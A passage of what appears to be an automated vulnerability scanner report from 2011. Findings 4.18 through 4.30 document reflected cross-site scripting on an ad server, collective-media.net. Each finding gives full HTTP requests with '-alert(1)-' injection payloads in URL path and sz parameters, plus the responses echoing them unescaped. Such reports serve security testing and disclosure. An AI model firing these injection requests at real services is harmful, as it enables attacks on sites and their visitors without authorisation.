P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7362
Date: Sat, 17 Sep 2011 16:25:34 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30322335468_1316276734","http://ad.doubleclick.net/adjaac19'-alert(1)-'6ed63ccc02d/bzo.454.61DCBAA1/_default;net=bzo;u=,bzo-30322335468_1316276734,1229bf517f8af24,sports,;;cmw=owl;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.18. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d936d'-alert(1)-'4c985a1bafd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.454.61DCBAA1d936d'-alert(1)-'4c985a1bafd/_default;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 16:25:35 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30415204234_1316276735","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1d936d'-alert(1)-'4c985a1bafd/_default;net=bzo;u=,bzo-30415204234_1316276735,1229bf517f8af24,sports,;;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.19. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b12e'-alert(1)-'945e5cb6e32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.454.61DCBAA1/_default9b12e'-alert(1)-'945e5cb6e32;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 16:25:35 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30308893230_1316276735","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1/_default9b12e'-alert(1)-'945e5cb6e32;net=bzo;u=,bzo-30308893230_1316276735,1229bf517f8af24,sports,;;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.20. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc96'-alert(1)-'b8781adc851 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.454.61DCBAA1/_default;sz=1bc96'-alert(1)-'b8781adc851 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7329
Date: Sat, 17 Sep 2011 16:25:27 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("bzo-30101590727_1316276727","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1/_default;net=bzo;u=,bzo-30101590727_1316276727,1229bf517f8af24,none,;;sz=1bc96'-alert(1)-'b8781adc851;contx=none;dc=s;btg=?","1bc96'-alert(1)-'b8781adc851","",true);</scr'+'ipt>
...[SNIP]...

4.21. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c87f'-alert(1)-'f1f13cb8f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj6c87f'-alert(1)-'f1f13cb8f9d/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:08 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30318841590_1316278088","http://ad.doubleclick.net/adj6c87f'-alert(1)-'f1f13cb8f9d/q1.q.seattlepostintelligencer/be_home;net=q1;u=,q1-30318841590_1316278088,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+
...[SNIP]...

4.22. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81ef'-alert(1)-'b5262d5dc96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencerd81ef'-alert(1)-'b5262d5dc96/be_home;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:09 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30309610626_1316278089","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencerd81ef'-alert(1)-'b5262d5dc96/be_home;net=q1;u=,q1-30309610626_1316278089,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.23. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8316e'-alert(1)-'256db4774f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencer/be_home8316e'-alert(1)-'256db4774f0;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:10 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30517347600_1316278090","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/be_home8316e'-alert(1)-'256db4774f0;net=q1;u=,q1-30517347600_1316278090,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.24. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca413'-alert(1)-'23a95e8eafa was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencer/be_home;sz=ca413'-alert(1)-'23a95e8eafa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7347
Date: Sat, 17 Sep 2011 16:48:05 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
ollectiveMedia.createAndAttachAd("q1-30517831260_1316278085","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/be_home;net=q1;u=,q1-30517831260_1316278085,121773f9380f32f,none,;;cmw=nurl;sz=ca413'-alert(1)-'23a95e8eafa;contx=none;dc=s;btg=?","ca413'-alert(1)-'23a95e8eafa","",true);</scr'+'ipt>
...[SNIP]...

4.25. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baef0'-alert(1)-'39cff7264f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjbaef0'-alert(1)-'39cff7264f0/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:32 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219105289_1316278172","http://ad.doubleclick.net/adjbaef0'-alert(1)-'39cff7264f0/q1.q.seattlepostintelligencer/home;net=q1;u=,q1-30219105289_1316278172,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.26. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76532'-alert(1)-'8e8c22c30a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencer76532'-alert(1)-'8e8c22c30a1/home;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:32 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30202844826_1316278172","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer76532'-alert(1)-'8e8c22c30a1/home;net=q1;u=,q1-30202844826_1316278172,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.27. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b257'-alert(1)-'8e4facbf4cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencer/home7b257'-alert(1)-'8e4facbf4cf;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30301510334_1316278173","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home7b257'-alert(1)-'8e4facbf4cf;net=q1;u=,q1-30301510334_1316278173,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f849'-alert(1)-'1da09993cbd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencer/home;sz=5f849'-alert(1)-'1da09993cbd HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7314
Date: Sat, 17 Sep 2011 16:49:27 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("q1-30313547426_1316278167","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home;net=q1;u=,q1-30313547426_1316278167,,none,;;cmw=nurl;sz=5f849'-alert(1)-'1da09993cbd;contx=none;dc=s;btg=?","5f849'-alert(1)-'1da09993cbd","",true);</scr'+'ipt>
...[SNIP]...

4.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54ba1'-alert(1)-'e8903b7b342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj54ba1'-alert(1)-'e8903b7b342/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30509901420_1316276623","http://ad.doubleclick.net/adj54ba1'-alert(1)-'e8903b7b342/q1.q.seattlepostintelligencer/qo;net=q1;u=,q1-30509901420_1316276623,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt
...[SNIP]...

4.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 400ca'-alert(1)-'bb299063a32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencer400ca'-alert(1)-'bb299063a32/qo;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
